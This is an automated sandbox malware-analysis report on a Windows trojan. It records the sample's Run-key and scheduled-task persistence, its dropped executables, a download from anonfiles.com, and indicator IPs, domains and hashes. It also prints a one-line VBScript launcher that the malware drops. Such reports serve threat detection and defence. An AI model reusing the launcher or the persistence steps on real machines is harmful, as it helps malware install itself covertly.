Analysis ID:	432870
Start date:	10.06.2021
Start time:	21:18:22
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 14m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	wa71myDkbQ (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	53
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.evad.winEXE@46/15@3/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 57.7% (good quality ratio 53.9%) Quality average: 76.4% Quality standard deviation: 27.9%
HCA Information:	Successful, ratio: 64% Number of executed functions: 123 Number of non-executed functions: 320
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 52.255.188.83, 52.147.198.201, 184.30.21.144, 23.57.80.111, 93.184.221.240, 51.103.5.186, 20.82.209.183, 20.50.102.62, 92.122.213.194, 92.122.213.247, 104.43.193.48, 20.54.104.15, 20.54.26.129, 20.54.7.98, 20.82.210.154 Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, wu.azureedge.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, client.wns.windows.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size exceeded maximum capacity and may have missing disassembly code. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
21:20:25	Task Scheduler	Run new task: {AELSS3UH-VR7V-NBSY-5O4X-Q8QSBKMTZAA2} path: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe
21:20:25	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run {AELSS3UH-VR7V-NBSY-5O4X-Q8QSBKMTZAA2} C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe
21:20:34	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run {AELSS3UH-VR7V-NBSY-5O4X-Q8QSBKMTZAA2} C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe
21:20:42	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run {AELSS3UH-VR7V-NBSY-5O4X-Q8QSBKMTZAA2} C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe
21:20:59	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
217.64.149.169	AdviceSlip.xls	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
cdn-101.anonfiles.com	AdviceSlip.xls	Get hash	malicious	Browse	217.64.149.169
anonfiles.com	0g3QvGXMBv.exe	Get hash	malicious	Browse	104.21.60.53
	INV_6682738993_IMG.exe	Get hash	malicious	Browse	104.21.60.53
	oololo.doc	Get hash	malicious	Browse	172.67.192.114
	IMG_INVOICE_6628862572.exe	Get hash	malicious	Browse	104.21.60.53
	BL.pdf.exe	Get hash	malicious	Browse	104.21.60.53
	Proforma HBK Equip Req ozen-global 20.04.2021 cc (1).xlsx.exe	Get hash	malicious	Browse	104.21.49.182
	INVOICE N. 7.pdf.exe	Get hash	malicious	Browse	104.21.49.182
	WaybillDoc_5736357561.pdf.exe	Get hash	malicious	Browse	172.67.191.178
	VWR CI 160421.xlsx.exe	Get hash	malicious	Browse	172.67.191.178
	00909000870.exe	Get hash	malicious	Browse	172.67.190.59
	00909000870.exe	Get hash	malicious	Browse	172.67.195.139
	SecuriteInfo.com.Trojan.Siggen13.7926.26442.exe	Get hash	malicious	Browse	172.67.195.139
	000OUTQ080519103.pdf.exe	Get hash	malicious	Browse	172.67.164.131
	Inquiry 040721_pdf.exe	Get hash	malicious	Browse	104.21.35.249
	Specification 01012_pdf.exe	Get hash	malicious	Browse	172.67.181.195
	Swift Copy Against due Invoice.PDF.exe	Get hash	malicious	Browse	172.64.207.3
	Ref150420190619A-B0270PEL. pdf.exe	Get hash	malicious	Browse	172.64.206.3
	DHL DELIVERY NOTE 2021003982721.exe	Get hash	malicious	Browse	172.67.145.1
	o1N0Ej5dP0.exe	Get hash	malicious	Browse	45.148.16.42
	muOvK6dngg.exe	Get hash	malicious	Browse	45.148.16.42

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	80va15z6m1.exe	Get hash	malicious	Browse	162.159.134.233
	Ref#Doc30504871 Wyg.htm	Get hash	malicious	Browse	104.16.18.94
	DNPr7t0GMY.exe	Get hash	malicious	Browse	23.227.38.74
	o8RYFTZsuU.exe	Get hash	malicious	Browse	162.159.129.233
	MrjC4jkPL8.exe	Get hash	malicious	Browse	162.159.129.233
	3c2pU82NQD.exe	Get hash	malicious	Browse	104.21.19.200
	#Ud83d#Udce9-peter.nash.htm	Get hash	malicious	Browse	104.18.11.207
	SKlGhwkzTi.exe	Get hash	malicious	Browse	104.21.65.7
	RFQ-sib.exe	Get hash	malicious	Browse	104.21.19.200
	PO.doc	Get hash	malicious	Browse	104.21.19.200
	Evershedsnicea NDA file attach...htm	Get hash	malicious	Browse	104.16.18.94
	SecuriteInfo.com.Trojan.PackedNET.825.24532.exe	Get hash	malicious	Browse	172.67.188.154
	090049000009000.exe	Get hash	malicious	Browse	104.21.19.200
	Letter 1019.xlsx	Get hash	malicious	Browse	172.67.161.4
	fTxhRIDnrC.dll	Get hash	malicious	Browse	104.20.185.68
	Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Get hash	malicious	Browse	23.227.38.74
	UGGJ4NnzFz.exe	Get hash	malicious	Browse	23.227.38.74
	Order.exe	Get hash	malicious	Browse	104.21.40.174
	DocumentScanCopy2021_pdf.exe	Get hash	malicious	Browse	104.21.19.200
	RRY0yKj2HM.dll	Get hash	malicious	Browse	104.20.184.68
OBE-EUROPEObenetworkEuropeSE	Document.exe	Get hash	malicious	Browse	217.64.149.117
	MT103-Advance.Payment....(1)pdf.exe	Get hash	malicious	Browse	185.157.161.20
	SecuriteInfo.com.Trojan.Win32.Save.a.18385.exe	Get hash	malicious	Browse	185.157.161.205
	IQw78D0e5Y.exe	Get hash	malicious	Browse	185.157.161.205
	f 3839.doc	Get hash	malicious	Browse	185.157.161.205
	faktura 197.doc	Get hash	malicious	Browse	185.157.161.205
	Document.exe	Get hash	malicious	Browse	217.64.149.117
	Document.exe	Get hash	malicious	Browse	217.64.149.117
	AZ8bqI5KJf.exe	Get hash	malicious	Browse	185.157.161.205
	faktura 0835.doc	Get hash	malicious	Browse	185.157.161.205
	DOC20210526.....6..pdf.exe	Get hash	malicious	Browse	185.157.161.20
	0g3QvGXMBv.exe	Get hash	malicious	Browse	45.148.16.46
	JPS95S3Y49.exe	Get hash	malicious	Browse	185.157.161.205
	faktura 0835.doc	Get hash	malicious	Browse	185.157.161.205
	INV_6682738993_IMG.exe	Get hash	malicious	Browse	45.148.16.46
	DHL-MPP582XXXXXXXXX.pdf.exe	Get hash	malicious	Browse	185.157.161.20
	faktura 0835.doc	Get hash	malicious	Browse	185.157.161.205
	TFWX82gIxx.exe	Get hash	malicious	Browse	185.157.161.205
	oololo.doc	Get hash	malicious	Browse	194.32.146.101
	CN-Invoice-XXXXX9808-190111432879905.exe	Get hash	malicious	Browse	185.157.161.20

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	Current-Status-062021-81197.xlsb	Get hash	malicious	Browse	104.21.10.26 217.64.149.169
	logo.png.exe	Get hash	malicious	Browse	104.21.10.26 217.64.149.169
	3F97s4aQjB.xlsx	Get hash	malicious	Browse	104.21.10.26 217.64.149.169
	WcCEh3daIE.xls	Get hash	malicious	Browse	104.21.10.26 217.64.149.169
	ATT00005.htm	Get hash	malicious	Browse	104.21.10.26 217.64.149.169
	kxjeAvsg1v.exe	Get hash	malicious	Browse	104.21.10.26 217.64.149.169
	VSA75RUmYZ.exe	Get hash	malicious	Browse	104.21.10.26 217.64.149.169
	iX22xMeXIc.exe	Get hash	malicious	Browse	104.21.10.26 217.64.149.169
	QWkt5w3cO2.exe	Get hash	malicious	Browse	104.21.10.26 217.64.149.169
	#U260e#Ufe0f Zeppelin.com AudioMessage_259-55.HTM	Get hash	malicious	Browse	104.21.10.26 217.64.149.169
	vTtOheCXBQ.exe	Get hash	malicious	Browse	104.21.10.26 217.64.149.169
	6b6zVfqxbk.xlsb	Get hash	malicious	Browse	104.21.10.26 217.64.149.169
	Check 57549.Html	Get hash	malicious	Browse	104.21.10.26 217.64.149.169
	audit-78958169.xlsb	Get hash	malicious	Browse	104.21.10.26 217.64.149.169
	Docc.html	Get hash	malicious	Browse	104.21.10.26 217.64.149.169
	askinstall39.exe	Get hash	malicious	Browse	104.21.10.26 217.64.149.169
	Lista e porosive.exe	Get hash	malicious	Browse	104.21.10.26 217.64.149.169
	askinstall39.exe	Get hash	malicious	Browse	104.21.10.26 217.64.149.169
	SecuriteInfo.com.Trojan.GenericKD.46459351.411.exe	Get hash	malicious	Browse	104.21.10.26 217.64.149.169
	Yl6482CO6U.exe	Get hash	malicious	Browse	104.21.10.26 217.64.149.169

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_AIKY.exe_cd2a954b8e472ab17db3c1e33a34f4249fab6933_85d469aa_15c00c54\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	11858
Entropy (8bit):	3.798732116904163
Encrypted:	false
SSDEEP:	192:75pcJHBUZMXaoujygiD/u7s1S274ItDmj:Dc5BUZMXaouja/u7s1X4ItDmj
MD5:	566DD867AA1DB55E1336E6C059FF45FE
SHA1:	CB894F5CD0E8D261EF71DB01CA065C3758AF998D
SHA-256:	391C504D1FE602205B5140BFB06FE8C386D1E7C339330A84823A2CFB74E2B4F7
SHA-512:	5EA828255AF911E4CE2795DB0D7E608D186E7432EFCE8A4D33B2D0EF48EF77D4938529F4FD6175523A891030128E4D197F3AB31D2210D8181F91D26A12ACCD3F
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.7.8.5.8.8.4.6.9.7.2.9.1.0.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.6.7.8.5.8.8.5.4.1.7.6.0.1.6.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.3.6.c.6.4.8.1.-.e.0.5.d.-.4.4.8.c.-.8.8.5.4.-.1.f.1.8.9.b.d.2.9.a.c.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.7.b.5.0.6.0.d.-.0.9.8.7.-.4.f.4.d.-.b.5.8.8.-.f.b.c.8.9.5.4.1.6.c.a.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.A.I.K.Y...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.b.4.-.0.0.0.1.-.0.0.1.7.-.5.a.4.d.-.5.e.1.a.7.9.5.e.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.7.f.1.9.3.a.8.8.7.8.a.c.7.f.f.4.a.2.6.0.c.f.9.9.f.9.0.6.9.3.f.0.0.0.0.f.f.f.f.!.0.0.0.0.e.c.e.5.f.e.f.2.8.0.6.1.b.5.5.2.3.9.c.c.4.2.0.6.d.b.7.b.9.b.1.2.9.5.f.e.1.0.4.d.!.A.I.K.Y...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1./.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDC3C.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Jun 11 04:20:49 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	85334
Entropy (8bit):	1.8477244482524657
Encrypted:	false
SSDEEP:	192:LmC86Cs9VGXExCU5lHnmvpEk4FYHnErsK1CTRPw0nIFtkPBuCiAjPyWb9T1ULHgX:VCakXExCU5lHmRrrErsjnIF+Zh1M2J
MD5:	F0F76A80C32957913AB682E778433C97
SHA1:	9C415126B993140C9533EBF8EC7181EFCC78DB91
SHA-256:	BC7A58A0776B55A9F17052FB859DD9A9538930EC773EBC27AC257FFCF84A93B4
SHA-512:	1856FEA5B778AF86D5D8191049F7A94F7A652CB9F5A6B7778097D2D169CD33AEDFD1FB979CF633AAC8528138352FDACEA0ABB30235A009B72407EDEF5CFEB274
Malicious:	false
Preview:	MDMP....... ..........`...................U...........B......8.......GenuineIntelW...........T..............`.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE66E.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8258
Entropy (8bit):	3.694661307355667
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNi2s6twu6YK2VSUdgmfbeSOCpro89b+JRgsftqm:RrlsNil6twu6YZSUdgmfbeSj+JRzfB
MD5:	2E81A669F3EA02A173138B2DCFF4B5D4
SHA1:	B46524168617F238DAFB7DA11D3EFFED2BA319F1
SHA-256:	F61F1FFEBD0964C9E869694AF885B328742EAF7B8941FDB2174EC3C0220E63D6
SHA-512:	AB49211F2A7B7A2719682208168F5E057BF4A9ED5478374EF223F1923B81BA7F31D105CD9BD3749B5919F988D831884C26F61D4AE66AFBB3D5325B1D6CA4FE20
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.0.4.4.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE9EA.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4521
Entropy (8bit):	4.443624893754038
Encrypted:	false
SSDEEP:	48:cvIwSD8zszUJgtWI9YWWSC8B+s8fm8M4JtJAHFS+q8qg2oa5GH8V1d:uITfzS33SN8RJR5GHg1d
MD5:	3883A2228674A378F1426773F3273369
SHA1:	1509186C562FC1204B351452C34F16ABCA6010F3
SHA-256:	9683FFDF510AE21B877763AA69E63AF7B879E7558F8381DAC8924FD9F6CE0453
SHA-512:	E8F09A208B0CE3AC116DB2E6FA3D7EE6C187E9A81637A84D0E40C85EE211EF7326BFAAB7C59848A29CBA99BBF247310A2E5C7389B6CEF2BDAF5A7FD91D787DC9
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1028971" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	238080
Entropy (8bit):	6.6224717629884875
Encrypted:	false
SSDEEP:	3072:XWZvS8urXtmOAg0Fuj7yNq7kmVsD7yS5lgaq3okhIzta1qR0LmT+TBjJOFQ/Rgb9:LdxAOkjjgaq3okia1qcmTmOFW8EOu
MD5:	EEA980187EA08E02E70765195BB1E473
SHA1:	ECE5FEF28061B55239CC4206DB7B9B1295FE104D
SHA-256:	0E7AEA838BC2BCCD24F316D362BDD2495184AC60C68E76A7ED294B4B8BA00182
SHA-512:	0A8BD7A3A202DBB0438FFE5D7CD1ED5822E161F695ACA280FD490F9E2C5E4976F7813EAA69F8F7B2C18808FF21E5590A76F75E7826E891968D755CC327EFF80F
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 90%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]^..<0.<0.<0..Z3.<0..Z5.#<0..Z4.<0.....<0..T5.<0..T4.<0..T3.<0..Z1.<0.<1..<0.3U9.<0.3U..<0.3U2.<0.Rich.<0.........PE..L......`.................V...\......9........p....@.......................................@..................................r...................................$......................................@............p..............................code.....U.......V.................. ..`.idata..j....p.......Z..............@..@data..... ...........l..............@....rsrc................z..............@..@.reloc...$.......&...\|..............@..B........................................................................................................................................................................................................................................................................................................

C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe:Zone.Identifier Download File
Process:	C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe
File Type:	empty
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Preview:

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\wa71myDkbQ.exe.log Download File
Process:	C:\Users\user\Desktop\wa71myDkbQ.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	425
Entropy (8bit):	5.340009400190196
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhav:ML9E4Ks2wKDE4KhK3VZ9pKhk
MD5:	CC144808DBAF00E03294347EADC8E779
SHA1:	A3434FC71BA82B7512C813840427C687ADDB5AEA
SHA-256:	3FC7B9771439E777A8F8B8579DD499F3EB90859AD30EFD8A765F341403FC7101
SHA-512:	A4F9EB98200BCAF388F89AABAF7EA57661473687265597B13192C24F06638C6339A3BD581DF4E002F26EE1BA09410F6A2BBDB4DA0CD40B59D63A09BAA1AADD3D
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\P1hemdxeu9[1].htm Download File
Process:	C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe
File Type:	HTML document, UTF-8 Unicode text, with very long lines
Category:	downloaded
Size (bytes):	10371
Entropy (8bit):	4.439458681614777
Encrypted:	false
SSDEEP:	192:/IIZApIMzccL3pQZwEmP6BL+eLZG7YEdGiJyYm:pZsIMAcTpQZwEfBL+eLZG7Qym
MD5:	47D487B5E8B7D4951A6899738F95F7E8
SHA1:	A1AFFC24ECCD62C47EC66FD463C423DEC580FF95
SHA-256:	D990DF5972320FDD3546F7BDDE414707F3BFA1B76B8308F11362B18B9521E5D2
SHA-512:	DFCB60FD349191BBB074A1748AF8CA4C615A1D2A8420BE0E666E5A0A75C4A2027D1A0C95DB8446CF6E07370848EF14248D4C3F6086E85C99F9AAF46586EAF0CD
Malicious:	false
IE Cache URL:	https://anonfiles.com/P1hemdxeu9
Preview:	<!DOCTYPE HTML>.<html lang="en_US">..<head>.. <meta charset="UTF-8">. <meta http-equiv="X-UA-Compatible" content="IE=edge">. <meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport">.. <meta name="robots" content="index, follow">. <title>cmd.exe - AnonFiles</title>. . <link href="//vjs.zencdn.net/7.3.0/video-js.min.css" rel="stylesheet">. . <link rel="stylesheet" href="/css/anonfiles.css?1621545025"/>. [if lt IE 9]>. <script src="https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js"></script>. <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>. <![endif]-->. <script type="text/javascript">. var cfg = {"authenticated":false,"upload_api_endpoint":"https:\/\/api.anonfiles.com\/upload","hua":false,"as":"11","domain":"anonfiles.com","pde":false};. </script>.. <script src="/js/app.js?1621545025"></script>.. <link rel="shortcut icon" href=

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\cmd[1].htm Download File
Process:	C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	5
Entropy (8bit):	1.5219280948873621
Encrypted:	false
SSDEEP:	3:hn:h
MD5:	FDA44910DEB1A460BE4AC5D56D61D837
SHA1:	F6D0C643351580307B2EAA6A7560E76965496BC7
SHA-256:	933B971C6388D594A23FA1559825DB5BEC8ADE2DB1240AA8FC9D0C684949E8C9
SHA-512:	57DDA9AA7C29F960CD7948A4E4567844D3289FA729E9E388E7F4EDCBDF16BF6A94536598B4F9FF8942849F1F96BD3C00BC24A75E748A36FBF2A145F63BF904C1
Malicious:	false
Preview:	0....

C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe Download File
Process:	C:\Users\user\Desktop\wa71myDkbQ.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	238080
Entropy (8bit):	6.6224717629884875
Encrypted:	false
SSDEEP:	3072:XWZvS8urXtmOAg0Fuj7yNq7kmVsD7yS5lgaq3okhIzta1qR0LmT+TBjJOFQ/Rgb9:LdxAOkjjgaq3okia1qcmTmOFW8EOu
MD5:	EEA980187EA08E02E70765195BB1E473
SHA1:	ECE5FEF28061B55239CC4206DB7B9B1295FE104D
SHA-256:	0E7AEA838BC2BCCD24F316D362BDD2495184AC60C68E76A7ED294B4B8BA00182
SHA-512:	0A8BD7A3A202DBB0438FFE5D7CD1ED5822E161F695ACA280FD490F9E2C5E4976F7813EAA69F8F7B2C18808FF21E5590A76F75E7826E891968D755CC327EFF80F
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 90%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]^..<0.<0.<0..Z3.<0..Z5.#<0..Z4.<0.....<0..T5.<0..T4.<0..T3.<0..Z1.<0.<1..<0.3U9.<0.3U..<0.3U2.<0.Rich.<0.........PE..L......`.................V...\......9........p....@.......................................@..................................r...................................$......................................@............p..............................code.....U.......V.................. ..`.idata..j....p.......Z..............@..@data..... ...........l..............@....rsrc................z..............@..@.reloc...$.......&...\|..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Ovwofzapxgm.vbs Download File
Process:	C:\Users\user\Desktop\wa71myDkbQ.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	109
Entropy (8bit):	4.980257408523516
Encrypted:	false
SSDEEP:	3:FER/n0eFHHo0nacwRE2J5xAIaNSW/NtACHMFjM:FER/lFHIcNwi23fGBiZM
MD5:	949A226424C8C87F73931AE9964B8085
SHA1:	5575A7315149104828E5AB60423FE7314AE5E6E2
SHA-256:	EDFC8F2B1FD9D247FC8CBC1B3B9E0FEE330B7E9C4606D1E34E4CE74AA146B62C
SHA-512:	FDCC4D1438AF613421AED69D9CA6F6D566CAE487AD4DE0631B6A91C148A9EECD1AD5877559DAE8A0123B85A824CCEEF04DAFB5CBCBC1E8CD1BDB81DB82868B7F
Malicious:	true
Preview:	CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe""", 1, False

C:\Users\user\AppData\Local\Temp\QshTYpu5dWRfMPie.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe
File Type:	HTML document, UTF-8 Unicode text, with very long lines
Category:	modified
Size (bytes):	10371
Entropy (8bit):	4.439458681614777
Encrypted:	false
SSDEEP:	192:/IIZApIMzccL3pQZwEmP6BL+eLZG7YEdGiJyYm:pZsIMAcTpQZwEfBL+eLZG7Qym
MD5:	47D487B5E8B7D4951A6899738F95F7E8
